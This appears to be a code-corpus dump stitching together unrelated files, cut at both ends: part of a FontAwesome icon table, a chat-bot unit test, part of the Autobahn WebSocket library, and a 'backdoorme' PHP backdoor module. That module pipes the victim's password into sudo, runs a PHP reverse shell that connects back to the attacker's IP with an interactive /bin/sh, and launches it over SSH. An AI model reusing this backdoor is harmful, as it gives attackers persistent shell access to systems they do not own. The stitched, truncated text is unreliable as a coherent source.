("fa-reorder", 0xf0c9),
("fa-repeat", 0xf01e),
("fa-reply", 0xf112),
("fa-reply-all", 0xf122),
("fa-retweet", 0xf079),
("fa-rmb", 0xf157),
("fa-road", 0xf018),
("fa-rocket", 0xf135),
("fa-rotate-left", 0xf0e2),
("fa-rotate-right", 0xf01e),
("fa-rouble", 0xf158),
("fa-rss", 0xf09e),
("fa-rss-square", 0xf143),
("fa-rub", 0xf158),
("fa-ruble", 0xf158),
("fa-rupee", 0xf156),
("fa-save", 0xf0c7),
("fa-scissors", 0xf0c4),
("fa-search", 0xf002),
("fa-search-minus", 0xf010),
("fa-search-plus", 0xf00e),
("fa-send", 0xf1d8),
("fa-send-o", 0xf1d9),
("fa-share", 0xf064),
("fa-share-alt", 0xf1e0),
("fa-share-alt-square", 0xf1e1),
("fa-share-square", 0xf14d),
("fa-share-square-o", 0xf045),
("fa-shield", 0xf132),
("fa-shopping-cart", 0xf07a),
("fa-sign-in", 0xf090),
("fa-sign-out", 0xf08b),
("fa-signal", 0xf012),
("fa-sitemap", 0xf0e8),
("fa-skype", 0xf17e),
("fa-slack", 0xf198),
("fa-sliders", 0xf1de),
("fa-smile-o", 0xf118),
("fa-sort", 0xf0dc),
("fa-sort-alpha-asc", 0xf15d),
("fa-sort-alpha-desc", 0xf15e),
("fa-sort-amount-asc", 0xf160),
("fa-sort-amount-desc", 0xf161),
("fa-sort-asc", 0xf0de),
("fa-sort-desc", 0xf0dd),
("fa-sort-down", 0xf0dd),
("fa-sort-numeric-asc", 0xf162),
("fa-sort-numeric-desc", 0xf163),
("fa-sort-up", 0xf0de),
("fa-soundcloud", 0xf1be),
("fa-space-shuttle", 0xf197),
("fa-spinner", 0xf110),
("fa-spoon", 0xf1b1),
("fa-spotify", 0xf1bc),
("fa-square", 0xf0c8),
("fa-square-o", 0xf096),
("fa-stack-exchange", 0xf18d),
("fa-stack-overflow", 0xf16c),
("fa-star", 0xf005),
("fa-star-half", 0xf089),
("fa-star-half-empty", 0xf123),
("fa-star-half-full", 0xf123),
("fa-star-half-o", 0xf123),
("fa-star-o", 0xf006),
("fa-steam", 0xf1b6),
("fa-steam-square", 0xf1b7),
("fa-step-backward", 0xf048),
("fa-step-forward", 0xf051),
("fa-stethoscope", 0xf0f1),
("fa-stop", 0xf04d),
("fa-strikethrough", 0xf0cc),
("fa-stumbleupon", 0xf1a4),
("fa-stumbleupon-circle", 0xf1a3),
("fa-subscript", 0xf12c),
("fa-suitcase", 0xf0f2),
("fa-sun-o", 0xf185),
("fa-superscript", 0xf12b),
("fa-support", 0xf1cd),
("fa-table", 0xf0ce),
("fa-tablet", 0xf10a),
("fa-tachometer", 0xf0e4),
("fa-tag", 0xf02b),
("fa-tags", 0xf02c),
("fa-tasks", 0xf0ae),
("fa-taxi", 0xf1ba),
("fa-tencent-weibo", 0xf1d5),
("fa-terminal", 0xf120),
("fa-text-height", 0xf034),
("fa-text-width", 0xf035),
("fa-th", 0xf00a),
("fa-th-large", 0xf009),
("fa-th-list", 0xf00b),
("fa-thumb-tack", 0xf08d),
("fa-thumbs-down", 0xf165),
("fa-thumbs-o-down", 0xf088),
("fa-thumbs-o-up", 0xf087),
("fa-thumbs-up", 0xf164),
("fa-ticket", 0xf145),
("fa-times", 0xf00d),
("fa-times-circle", 0xf057),
("fa-times-circle-o", 0xf05c),
("fa-tint", 0xf043),
("fa-toggle-down", 0xf150),
("fa-toggle-left", 0xf191),
("fa-toggle-right", 0xf152),
("fa-toggle-up", 0xf151),
("fa-trash-o", 0xf014),
("fa-tree", 0xf1bb),
("fa-trello", 0xf181),
("fa-trophy", 0xf091),
("fa-truck", 0xf0d1),
("fa-try", 0xf195),
("fa-tumblr", 0xf173),
("fa-tumblr-square", 0xf174),
("fa-turkish-lira", 0xf195),
("fa-twitter", 0xf099),
("fa-twitter-square", 0xf081),
("fa-umbrella", 0xf0e9),
("fa-underline", 0xf0cd),
("fa-undo", 0xf0e2),
("fa-university", 0xf19c),
("fa-unlink", 0xf127),
("fa-unlock", 0xf09c),
("fa-unlock-alt", 0xf13e),
("fa-unsorted", 0xf0dc),
("fa-upload", 0xf093),
("fa-usd", 0xf155),
("fa-user", 0xf007),
("fa-user-md", 0xf0f0),
("fa-users", 0xf0c0),
("fa-video-camera", 0xf03d),
("fa-vimeo-square", 0xf194),
("fa-vine", 0xf1ca),
("fa-vk", 0xf189),
("fa-volume-down", 0xf027),
("fa-volume-off", 0xf026),
("fa-volume-up", 0xf028),
("fa-warning", 0xf071),
("fa-wechat", 0xf1d7),
("fa-weibo", 0xf18a),
("fa-weixin", 0xf1d7),
("fa-wheelchair", 0xf193),
("fa-windows", 0xf17a),
("fa-won", 0xf159),
("fa-wordpress", 0xf19a),
("fa-wrench", 0xf0ad),
("fa-xing", 0xf168),
("fa-xing-square", 0xf169),
("fa-yahoo", 0xf19e),
("fa-yen", 0xf157),
("fa-youtube", 0xf167),
("fa-youtube-play", 0xf16a),
("fa-youtube-square", 0xf166) ]
FontAwesome = dict(( (code[0], unichr(code[1])) for code in _codepoints ))
| mit | -1,730,761,943,699,872,300 | 28.781676 | 88 | 0.544508 | false |
Kkevsterrr/backdoorme | backdoors/shell/php.py | 1 | 1529 | from backdoors.backdoor import *
class Php(Backdoor):
prompt = Fore.RED + "(php) " + Fore.BLUE + ">> " + Fore.RESET
def __init__(self, core):
cmd.Cmd.__init__(self)
self.intro = GOOD + "Using php module..."
self.core = core
self.options = {
"port" : Option("port", 53930, "port to connect to", True),
}
self.allow_modules = True
self.modules = {}
self.help_text = INFO + "Creates and runs a php backdoor which sends output to bash.\n"+INFO+"It does not automatically install a web server, but instead uses the php web module."
def get_command(self):
return "echo " + self.core.curtarget.pword + " | sudo -S php -r '$sock=fsockopen(\"" + self.core.localIP + "\"," + str(self.get_value("port")) + ");exec(\"/bin/sh -i <&3 >&3 2>&3\");'"
def do_exploit(self, args):
port = self.get_value("port")
target = self.core.curtarget
#input("Please enter the following command: nc -v -n -l -p %s in another shell to connect." % port)
self.listen("none", "none")
print(GOOD + "Initializing backdoor...")
target.ssh.exec_command(self.get_command())
for mod in self.modules.keys():
print(INFO + "Attempting to execute " + mod.name + " module...")
mod.exploit(self.get_command())
# for mod in self.portModules.keys():
# print(INFO + "Attempting to execute " + mod.name + " module...")
# mod.exploit(self.get_port())
| mit | 8,837,472,853,760,200,000 | 45.333333 | 192 | 0.568999 | false |
MeGotsThis/BotGotsThis | pkg/custom_command/tests/test_custom_query.py | 1 | 1560 | from lib.data.message import Message
from tests.unittest.base_custom import TestCustomField
# Needs to be imported last
from ..custom import query
class TestCustomCommandCustomQuery(TestCustomField):
def setUp(self):
super().setUp()
self.args = self.args._replace(field='query', message=Message('a b c'))
async def test(self):
self.args = self.args._replace(field='')
self.assertIsNone(await query.fieldQuery(self.args))
async def test_query(self):
self.assertEqual(await query.fieldQuery(self.args), 'b c')
async def test_caps(self):
self.args = self.args._replace(field='QUERY')
self.assertEqual(await query.fieldQuery(self.args), 'b c')
async def test_default(self):
self.args = self.args._replace(message=Message(''),
prefix='[', suffix=']')
self.assertEqual(await query.fieldQuery(self.args), '')
async def test_prefix(self):
self.args = self.args._replace(prefix='[')
self.assertEqual(await query.fieldQuery(self.args), '[b c')
async def test_prefix_blank(self):
self.args = self.args._replace(prefix='')
self.assertEqual(await query.fieldQuery(self.args), 'b c')
async def test_suffix(self):
self.args = self.args._replace(suffix=']')
self.assertEqual(await query.fieldQuery(self.args), 'b c]')
async def test_suffix_blank(self):
self.args = self.args._replace(suffix='')
self.assertEqual(await query.fieldQuery(self.args), 'b c')
| gpl-3.0 | 4,702,043,906,517,372,000 | 35.27907 | 79 | 0.642308 | false |
bzero/bitex | libs/autobahn/websocket.py | 1 | 156783 | ###############################################################################
##
## Copyright 2011-2013 Tavendo GmbH
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
##
###############################################################################
__all__ = ["createWsUrl",
"parseWsUrl",
"connectWS",
"listenWS",
"HttpException",
"ConnectionRequest",
"ConnectionResponse",
"Timings",
"WebSocketProtocol",
"WebSocketFactory",
"WebSocketServerProtocol",
"WebSocketServerFactory",
"WebSocketClientProtocol",
"WebSocketClientFactory"]
## The Python urlparse module currently does not contain the ws/wss
## schemes, so we add those dynamically (which is a hack of course).
##
import urlparse
wsschemes = ["ws", "wss"]
urlparse.uses_relative.extend(wsschemes)
urlparse.uses_netloc.extend(wsschemes)
urlparse.uses_params.extend(wsschemes)
urlparse.uses_query.extend(wsschemes)
urlparse.uses_fragment.extend(wsschemes)
import urllib
import binascii
import hashlib
import base64
import struct
import random
import os
from pprint import pformat
from array import array
from collections import deque
from twisted.internet import reactor, protocol
from twisted.python import log
from _version import __version__
from utf8validator import Utf8Validator
from xormasker import XorMaskerNull, createXorMasker
from httpstatus import *
from util import Stopwatch
def createWsUrl(hostname, port = None, isSecure = False, path = None, params = None):
"""
Create a WebSocket URL from components.
:param hostname: WebSocket server hostname.
:type hostname: str
:param port: WebSocket service port or None (to select default ports 80/443 depending on isSecure).
:type port: int
:param isSecure: Set True for secure WebSocket ("wss" scheme).
:type isSecure: bool
:param path: Path component of addressed resource (will be properly URL escaped).
:type path: str
:param params: A dictionary of key-values to construct the query component of the addressed resource (will be properly URL escaped).
:type params: dict
:returns: str -- Constructed WebSocket URL.
"""
if port is not None:
netloc = "%s:%d" % (hostname, port)
else:
if isSecure:
netloc = "%s:443" % hostname
else:
netloc = "%s:80" % hostname
if isSecure:
scheme = "wss"
else:
scheme = "ws"
if path is not None:
ppath = urllib.quote(path)
else:
ppath = "/"
if params is not None:
query = urllib.urlencode(params)
else:
query = None
return urlparse.urlunparse((scheme, netloc, ppath, None, query, None))
def parseWsUrl(url):
"""
Parses as WebSocket URL into it's components and returns a tuple (isSecure, host, port, resource, path, params).
isSecure is a flag which is True for wss URLs.
host is the hostname or IP from the URL.
port is the port from the URL or standard port derived from scheme (ws = 80, wss = 443).
resource is the /resource name/ from the URL, the /path/ together with the (optional) /query/ component.
path is the /path/ component properly unescaped.
params is the /query) component properly unescaped and returned as dictionary.
:param url: A valid WebSocket URL, i.e. `ws://localhost:9000/myresource?param1=23¶m2=666`
:type url: str
:returns: tuple -- A tuple (isSecure, host, port, resource, path, params)
"""
parsed = urlparse.urlparse(url)
if parsed.scheme not in ["ws", "wss"]:
raise Exception("invalid WebSocket scheme '%s'" % parsed.scheme)
if parsed.port is None or parsed.port == "":
if parsed.scheme == "ws":
port = 80
else:
port = 443
else:
port = int(parsed.port)
if parsed.fragment is not None and parsed.fragment != "":
raise Exception("invalid WebSocket URL: non-empty fragment '%s" % parsed.fragment)
if parsed.path is not None and parsed.path != "":
ppath = parsed.path
path = urllib.unquote(ppath)
else:
ppath = "/"
path = ppath
if parsed.query is not None and parsed.query != "":
resource = ppath + "?" + parsed.query
params = urlparse.parse_qs(parsed.query)
else:
resource = ppath
params = {}
return (parsed.scheme == "wss", parsed.hostname, port, resource, path, params)
def connectWS(factory, contextFactory = None, timeout = 30, bindAddress = None):
"""
Establish WebSocket connection to a server. The connection parameters like target
host, port, resource and others are provided via the factory.
:param factory: The WebSocket protocol factory to be used for creating client protocol instances.
:type factory: An :class:`autobahn.websocket.WebSocketClientFactory` instance.
:param contextFactory: SSL context factory, required for secure WebSocket connections ("wss").
:type contextFactory: A `twisted.internet.ssl.ClientContextFactory <http://twistedmatrix.com/documents/current/api/twisted.internet.ssl.ClientContextFactory.html>`_ instance.
:param timeout: Number of seconds to wait before assuming the connection has failed.
:type timeout: int
:param bindAddress: A (host, port) tuple of local address to bind to, or None.
:type bindAddress: tuple
:returns: obj -- An object which implements `twisted.interface.IConnector <http://twistedmatrix.com/documents/current/api/twisted.internet.interfaces.IConnector.html>`_.
"""
if factory.proxy is not None:
if factory.isSecure:
raise Exception("WSS over explicit proxies not implemented")
else:
conn = reactor.connectTCP(factory.proxy['host'], factory.proxy['port'], factory, timeout, bindAddress)
else:
if factory.isSecure:
if contextFactory is None:
# create default client SSL context factory when none given
from twisted.internet import ssl
contextFactory = ssl.ClientContextFactory()
conn = reactor.connectSSL(factory.host, factory.port, factory, contextFactory, timeout, bindAddress)
else:
conn = reactor.connectTCP(factory.host, factory.port, factory, timeout, bindAddress)
return conn
def listenWS(factory, contextFactory = None, backlog = 50, interface = ''):
"""
Listen for incoming WebSocket connections from clients. The connection parameters like
listening port and others are provided via the factory.
:param factory: The WebSocket protocol factory to be used for creating server protocol instances.
:type factory: An :class:`autobahn.websocket.WebSocketServerFactory` instance.
:param contextFactory: SSL context factory, required for secure WebSocket connections ("wss").
:type contextFactory: A twisted.internet.ssl.ContextFactory.
:param backlog: Size of the listen queue.
:type backlog: int
:param interface: The interface (derived from hostname given) to bind to, defaults to '' (all).
:type interface: str
:returns: obj -- An object that implements `twisted.interface.IListeningPort <http://twistedmatrix.com/documents/current/api/twisted.internet.interfaces.IListeningPort.html>`_.
"""
if factory.isSecure:
if contextFactory is None:
raise Exception("Secure WebSocket listen requested, but no SSL context factory given")
listener = reactor.listenSSL(factory.port, factory, contextFactory, backlog, interface)
else:
listener = reactor.listenTCP(factory.port, factory, backlog, interface)
return listener
class FrameHeader:
"""
Thin-wrapper for storing WebSocket frame metadata.
FOR INTERNAL USE ONLY!
"""
def __init__(self, opcode, fin, rsv, length, mask):
"""
Constructor.
:param opcode: Frame opcode (0-15).
:type opcode: int
:param fin: Frame FIN flag.
:type fin: bool
:param rsv: Frame reserved flags (0-7).
:type rsv: int
:param length: Frame payload length.
:type length: int
:param mask: Frame mask (binary string) or None.
:type mask: str
"""
self.opcode = opcode
self.fin = fin
self.rsv = rsv
self.length = length
self.mask = mask
class HttpException:
"""
Throw an instance of this class to deny a WebSocket connection
during handshake in :meth:`autobahn.websocket.WebSocketServerProtocol.onConnect`.
You can find definitions of HTTP status codes in module :mod:`autobahn.httpstatus`.
"""
def __init__(self, code, reason):
"""
Constructor.
:param code: HTTP error code.
:type code: int
:param reason: HTTP error reason.
:type reason: str
"""
self.code = code
self.reason = reason
class ConnectionRequest:
"""
Thin-wrapper for WebSocket connection request information
provided in :meth:`autobahn.websocket.WebSocketServerProtocol.onConnect` when a WebSocket
client establishes a connection to a WebSocket server.
"""
def __init__(self, peer, peerstr, headers, host, path, params, version, origin, protocols, extensions):
"""
Constructor.
:param peer: IP address/port of the connecting client.
:type peer: object
:param peerstr: IP address/port of the connecting client as string.
:type peerstr: str
:param headers: HTTP headers from opening handshake request.
:type headers: dict
:param host: Host from opening handshake HTTP header.
:type host: str
:param path: Path from requested HTTP resource URI. For example, a resource URI of `/myservice?foo=23&foo=66&bar=2` will be parsed to `/myservice`.
:type path: str
:param params: Query parameters (if any) from requested HTTP resource URI. For example, a resource URI of `/myservice?foo=23&foo=66&bar=2` will be parsed to `{'foo': ['23', '66'], 'bar': ['2']}`.
:type params: dict of arrays of strings
:param version: The WebSocket protocol version the client announced (and will be spoken, when connection is accepted).
:type version: int
:param origin: The WebSocket origin header or None. Note that this only a reliable source of information for browser clients!
:type origin: str
:param protocols: The WebSocket (sub)protocols the client announced. You must select and return one of those (or None) in :meth:`autobahn.websocket.WebSocketServerProtocol.onConnect`.
:type protocols: array of strings
:param extensions: The WebSocket extensions the client requested and the server accepted (and thus will be spoken, when WS connection is established).
:type extensions: array of strings
"""
self.peer = peer
self.peerstr = peerstr
self.headers = headers
self.host = host
self.path = path
self.params = params
self.version = version
self.origin = origin
self.protocols = protocols
self.extensions = extensions
class ConnectionResponse():
"""
Thin-wrapper for WebSocket connection response information
provided in :meth:`autobahn.websocket.WebSocketClientProtocol.onConnect` when a WebSocket
client has established a connection to a WebSocket server.
"""
def __init__(self, peer, peerstr, headers, version, protocol, extensions):
"""
Constructor.
:param peer: IP address/port of the connected server.
:type peer: object
:param peerstr: IP address/port of the connected server as string.
:type peerstr: str
:param headers: HTTP headers from opening handshake response.
:type headers: dict
:param version: The WebSocket protocol version that is spoken.
:type version: int
:param protocol: The WebSocket (sub)protocol in use.
:type protocol: str
:param extensions: The WebSocket extensions in use.
:type extensions: array of strings
"""
self.peer = peer
self.peerstr = peerstr
self.headers = headers
self.version = version
self.protocol = protocol
self.extensions = extensions
def parseHttpHeader(data):
"""
Parses the beginning of a HTTP request header (the data up to the \n\n line) into a pair
of status line and HTTP headers dictionary.
Header keys are normalized to all-lower-case.
FOR INTERNAL USE ONLY!
:param data: The HTTP header data up to the \n\n line.
:type data: str
:returns: tuple -- Tuple of HTTP status line, headers and headers count.
"""
raw = data.splitlines()
http_status_line = raw[0].strip()
http_headers = {}
http_headers_cnt = {}
for h in raw[1:]:
i = h.find(":")
if i > 0:
## HTTP header keys are case-insensitive
key = h[:i].strip().lower()
## not sure if UTF-8 is allowed for HTTP header values..
value = h[i+1:].strip().decode("utf-8")
## handle HTTP headers split across multiple lines
if http_headers.has_key(key):
http_headers[key] += ", %s" % value
http_headers_cnt[key] += 1
else:
http_headers[key] = value
http_headers_cnt[key] = 1
else:
# skip bad HTTP header
pass
return (http_status_line, http_headers, http_headers_cnt)
class Timings:
"""
Helper class to track timings by key. This class also supports item access,
iteration and conversion to string.
"""
def __init__(self):
self._stopwatch = Stopwatch()
self._timings = {}
def track(self, key):
"""
Track elapsed for key.
:param key: Key under which to track the timing.
:type key: str
"""
self._timings[key] = self._stopwatch.elapsed()
def diff(self, startKey, endKey, format = True):
"""
Get elapsed difference between two previously tracked keys.
:param startKey: First key for interval (older timestamp).
:type startKey: str
:param endKey: Second key for interval (younger timestamp).
:type endKey: str
:param format: If `True`, format computed time period and return string.
:type format: bool
:returns: float or str -- Computed time period in seconds (or formatted string).
"""
if self._timings.has_key(endKey) and self._timings.has_key(startKey):
d = self._timings[endKey] - self._timings[startKey]
if format:
if d < 0.00001: # 10us
s = "%d ns" % round(d * 1000000000.)
elif d < 0.01: # 10ms
s = "%d us" % round(d * 1000000.)
elif d < 10: # 10s
s = "%d ms" % round(d * 1000.)
else:
s = "%d s" % round(d)
return s.rjust(8)
else:
return d
else:
if format:
return "n.a.".rjust(8)
else:
return None
def __getitem__(self, key):
return self._timings.get(key, None)
def __iter__(self):
return self._timings.__iter__(self)
def __str__(self):
return pformat(self._timings)
class WebSocketProtocol(protocol.Protocol):
"""
A Twisted Protocol class for WebSocket. This class is used by both WebSocket
client and server protocol version. It is unusable standalone, for example
the WebSocket initial handshake is implemented in derived class differently
for clients and servers.
"""
SUPPORTED_SPEC_VERSIONS = [0, 10, 11, 12, 13, 14, 15, 16, 17, 18]
"""
WebSocket protocol spec (draft) versions supported by this implementation.
Use of version 18 indicates RFC6455. Use of versions < 18 indicate actual
draft spec versions (Hybi-Drafts). Use of version 0 indicates Hixie-76.
"""
SUPPORTED_PROTOCOL_VERSIONS = [0, 8, 13]
"""
WebSocket protocol versions supported by this implementation. For Hixie-76,
there is no protocol version announced in HTTP header, and we just use the
draft version (0) in this case.
"""
SPEC_TO_PROTOCOL_VERSION = {0: 0, 10: 8, 11: 8, 12: 8, 13: 13, 14: 13, 15: 13, 16: 13, 17: 13, 18: 13}
"""
Mapping from protocol spec (draft) version to protocol version. For Hixie-76,
there is no protocol version announced in HTTP header, and we just use the
pseudo protocol version 0 in this case.
"""
PROTOCOL_TO_SPEC_VERSION = {0: 0, 8: 12, 13: 18}
"""
Mapping from protocol version to the latest protocol spec (draft) version
using that protocol version. For Hixie-76, there is no protocol version
announced in HTTP header, and we just use the draft version (0) in this case.
"""
DEFAULT_SPEC_VERSION = 18
"""
Default WebSocket protocol spec version this implementation speaks: final RFC6455.
"""
DEFAULT_ALLOW_HIXIE76 = False
"""
By default, this implementation will not allow to speak the obsoleted
Hixie-76 protocol version. That protocol version has security issues, but
is still spoken by some clients. Enable at your own risk! Enabling can be
done by using setProtocolOptions() on the factories for clients and servers.
"""
_WS_MAGIC = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"
"""
Protocol defined magic used during WebSocket handshake (used in Hybi-drafts
and final RFC6455.
"""
_QUEUED_WRITE_DELAY = 0.00001
"""
For synched/chopped writes, this is the reactor reentry delay in seconds.
"""
MESSAGE_TYPE_TEXT = 1
"""
WebSocket text message type (UTF-8 payload).
"""
MESSAGE_TYPE_BINARY = 2
"""
WebSocket binary message type (arbitrary binary payload).
"""
## WebSocket protocol state:
## (STATE_PROXY_CONNECTING) => STATE_CONNECTING => STATE_OPEN => STATE_CLOSING => STATE_CLOSED
##
STATE_CLOSED = 0
STATE_CONNECTING = 1
STATE_CLOSING = 2
STATE_OPEN = 3
STATE_PROXY_CONNECTING = 4
## Streaming Send State
SEND_STATE_GROUND = 0
SEND_STATE_MESSAGE_BEGIN = 1
SEND_STATE_INSIDE_MESSAGE = 2
SEND_STATE_INSIDE_MESSAGE_FRAME = 3
## WebSocket protocol close codes
##
CLOSE_STATUS_CODE_NORMAL = 1000
"""Normal close of connection."""
CLOSE_STATUS_CODE_GOING_AWAY = 1001
"""Going away."""
CLOSE_STATUS_CODE_PROTOCOL_ERROR = 1002
"""Protocol error."""
CLOSE_STATUS_CODE_UNSUPPORTED_DATA = 1003
"""Unsupported data."""
CLOSE_STATUS_CODE_RESERVED1 = 1004
"""RESERVED"""
CLOSE_STATUS_CODE_NULL = 1005 # MUST NOT be set in close frame!
"""No status received. (MUST NOT be used as status code when sending a close)."""
CLOSE_STATUS_CODE_ABNORMAL_CLOSE = 1006 # MUST NOT be set in close frame!
"""Abnormal close of connection. (MUST NOT be used as status code when sending a close)."""
CLOSE_STATUS_CODE_INVALID_PAYLOAD = 1007
"""Invalid frame payload data."""
CLOSE_STATUS_CODE_POLICY_VIOLATION = 1008
"""Policy violation."""
CLOSE_STATUS_CODE_MESSAGE_TOO_BIG = 1009
"""Message too big."""
CLOSE_STATUS_CODE_MANDATORY_EXTENSION = 1010
"""Mandatory extension."""
CLOSE_STATUS_CODE_INTERNAL_ERROR = 1011
"""The peer encountered an unexpected condition or internal error."""
CLOSE_STATUS_CODE_TLS_HANDSHAKE_FAILED = 1015 # MUST NOT be set in close frame!
"""TLS handshake failed, i.e. server certificate could not be verified. (MUST NOT be used as status code when sending a close)."""
CLOSE_STATUS_CODES_ALLOWED = [CLOSE_STATUS_CODE_NORMAL,
CLOSE_STATUS_CODE_GOING_AWAY,
CLOSE_STATUS_CODE_PROTOCOL_ERROR,
CLOSE_STATUS_CODE_UNSUPPORTED_DATA,
CLOSE_STATUS_CODE_INVALID_PAYLOAD,
CLOSE_STATUS_CODE_POLICY_VIOLATION,
CLOSE_STATUS_CODE_MESSAGE_TOO_BIG,
CLOSE_STATUS_CODE_MANDATORY_EXTENSION,
CLOSE_STATUS_CODE_INTERNAL_ERROR]
"""Status codes allowed to send in close."""
def onOpen(self):
"""
Callback when initial WebSocket handshake was completed. Now you may send messages.
Default implementation does nothing. Override in derived class.
Modes: Hybi, Hixie
"""
if self.debugCodePaths:
log.msg("WebSocketProtocol.onOpen")
def onMessageBegin(self, opcode):
"""
Callback when receiving a new message has begun. Default implementation will
prepare to buffer message frames. Override in derived class.
Modes: Hybi, Hixie
:param opcode: Opcode of message.
:type opcode: int
"""
self.message_opcode = opcode
self.message_data = []
self.message_data_total_length = 0
def onMessageFrameBegin(self, length, reserved):
"""
Callback when receiving a new message frame has begun. Default implementation will
prepare to buffer message frame data. Override in derived class.
Modes: Hybi
:param length: Payload length of message frame which is to be received.
:type length: int
:param reserved: Reserved bits set in frame (an integer from 0 to 7).
:type reserved: int
"""
self.frame_length = length
self.frame_reserved = reserved
self.frame_data = []
self.message_data_total_length += length
if not self.failedByMe:
if self.maxMessagePayloadSize > 0 and self.message_data_total_length > self.maxMessagePayloadSize:
self.wasMaxMessagePayloadSizeExceeded = True
self.failConnection(WebSocketProtocol.CLOSE_STATUS_CODE_MESSAGE_TOO_BIG, "message exceeds payload limit of %d octets" % self.maxMessagePayloadSize)
elif self.maxFramePayloadSize > 0 and length > self.maxFramePayloadSize:
self.wasMaxFramePayloadSizeExceeded = True
self.failConnection(WebSocketProtocol.CLOSE_STATUS_CODE_POLICY_VIOLATION, "frame exceeds payload limit of %d octets" % self.maxFramePayloadSize)
def onMessageFrameData(self, payload):
"""
Callback when receiving data witin message frame. Default implementation will
buffer data for frame. Override in derived class.
Modes: Hybi, Hixie
Notes:
- For Hixie mode, this method is slightly misnamed for historic reasons.
:param payload: Partial payload for message frame.
:type payload: str
"""
if not self.failedByMe:
if self.websocket_version == 0:
self.message_data_total_length += len(payload)
if self.maxMessagePayloadSize > 0 and self.message_data_total_length > self.maxMessagePayloadSize:
self.wasMaxMessagePayloadSizeExceeded = True
self.failConnection(WebSocketProtocol.CLOSE_STATUS_CODE_MESSAGE_TOO_BIG, "message exceeds payload limit of %d octets" % self.maxMessagePayloadSize)
self.message_data.append(payload)
else:
self.frame_data.append(payload)
def onMessageFrameEnd(self):
"""
Callback when a message frame has been completely received. Default implementation
will flatten the buffered frame data and callback onMessageFrame. Override
in derived class.
Modes: Hybi
"""
if not self.failedByMe:
self.onMessageFrame(self.frame_data, self.frame_reserved)
self.frame_data = None
def onMessageFrame(self, payload, reserved):
"""
Callback fired when complete message frame has been received. Default implementation
will buffer frame for message. Override in derived class.
Modes: Hybi
:param payload: Message frame payload.
:type payload: list of str
:param reserved: Reserved bits set in frame (an integer from 0 to 7).
:type reserved: int
"""
if not self.failedByMe:
self.message_data.extend(payload)
def onMessageEnd(self):
"""
Callback when a message has been completely received. Default implementation
will flatten the buffered frames and callback onMessage. Override
in derived class.
Modes: Hybi, Hixie
"""
if not self.failedByMe:
payload = ''.join(self.message_data)
if self.trackedTimings:
self.trackedTimings.track("onMessage")
self.onMessage(payload, self.message_opcode == WebSocketProtocol.MESSAGE_TYPE_BINARY)
self.message_data = None
def onMessage(self, payload, binary):
"""
Callback when a complete message was received. Default implementation does nothing.
Override in derived class.
Modes: Hybi, Hixie
:param payload: Message payload (UTF-8 encoded text string or binary string). Can also be an empty string, when message contained no payload.
:type payload: str
:param binary: If True, payload is binary, otherwise text.
:type binary: bool
"""
if self.debug:
log.msg("WebSocketProtocol.onMessage")
def onPing(self, payload):
"""
Callback when Ping was received. Default implementation responds
with a Pong. Override in derived class.
Modes: Hybi
:param payload: Payload of Ping, when there was any. Can be arbitrary, up to 125 octets.
:type payload: str
"""
if self.debug:
log.msg("WebSocketProtocol.onPing")
if self.state == WebSocketProtocol.STATE_OPEN:
self.sendPong(payload)
def onPong(self, payload):
"""
Callback when Pong was received. Default implementation does nothing.
Override in derived class.
Modes: Hybi
:param payload: Payload of Pong, when there was any. Can be arbitrary, up to 125 octets.
"""
if self.debug:
log.msg("WebSocketProtocol.onPong")
def onClose(self, wasClean, code, reason):
"""
Callback when the connection has been closed. Override in derived class.
Modes: Hybi, Hixie
:param wasClean: True, iff the connection was closed cleanly.
:type wasClean: bool
:param code: None or close status code (sent by peer), if there was one (:class:`WebSocketProtocol`.CLOSE_STATUS_CODE_*).
:type code: int
:param reason: None or close reason (sent by peer) (when present, a status code MUST have been also be present).
:type reason: str
"""
if self.debugCodePaths:
s = "WebSocketProtocol.onClose:\n"
s += "wasClean=%s\n" % wasClean
s += "code=%s\n" % code
s += "reason=%s\n" % reason
s += "self.closedByMe=%s\n" % self.closedByMe
s += "self.failedByMe=%s\n" % self.failedByMe
s += "self.droppedByMe=%s\n" % self.droppedByMe
s += "self.wasClean=%s\n" % self.wasClean
s += "self.wasNotCleanReason=%s\n" % self.wasNotCleanReason
s += "self.localCloseCode=%s\n" % self.localCloseCode
s += "self.localCloseReason=%s\n" % self.localCloseReason
s += "self.remoteCloseCode=%s\n" % self.remoteCloseCode
s += "self.remoteCloseReason=%s\n" % self.remoteCloseReason
log.msg(s)
def onCloseFrame(self, code, reasonRaw):
"""
Callback when a Close frame was received. The default implementation answers by
sending a Close when no Close was sent before. Otherwise it drops
the TCP connection either immediately (when we are a server) or after a timeout
(when we are a client and expect the server to drop the TCP).
Modes: Hybi, Hixie
Notes:
- For Hixie mode, this method is slightly misnamed for historic reasons.
- For Hixie mode, code and reasonRaw are silently ignored.
:param code: None or close status code, if there was one (:class:`WebSocketProtocol`.CLOSE_STATUS_CODE_*).
:type code: int
:param reason: None or close reason (when present, a status code MUST have been also be present).
:type reason: str
"""
if self.debugCodePaths:
log.msg("WebSocketProtocol.onCloseFrame")
self.remoteCloseCode = code
self.remoteCloseReason = reasonRaw
## reserved close codes: 0-999, 1004, 1005, 1006, 1011-2999, >= 5000
##
if code is not None and (code < 1000 or (code >= 1000 and code <= 2999 and code not in WebSocketProtocol.CLOSE_STATUS_CODES_ALLOWED) or code >= 5000):
if self.protocolViolation("invalid close code %d" % code):
return True
## closing reason
##
if reasonRaw is not None:
## we use our own UTF-8 validator to get consistent and fully conformant
## UTF-8 validation behavior
u = Utf8Validator()
val = u.validate(reasonRaw)
if not val[0]:
if self.invalidPayload("invalid close reason (non-UTF-8 payload)"):
return True
if self.state == WebSocketProtocol.STATE_CLOSING:
## We already initiated the closing handshake, so this
## is the peer's reply to our close frame.
## cancel any closing HS timer if present
##
if self.closeHandshakeTimeoutCall is not None:
if self.debugCodePaths:
log.msg("closeHandshakeTimeoutCall.cancel")
self.closeHandshakeTimeoutCall.cancel()
self.closeHandshakeTimeoutCall = None
self.wasClean = True
if self.isServer:
## When we are a server, we immediately drop the TCP.
self.dropConnection(abort = True)
else:
## When we are a client, the server should drop the TCP
## If that doesn't happen, we do. And that will set wasClean = False.
if self.serverConnectionDropTimeout > 0:
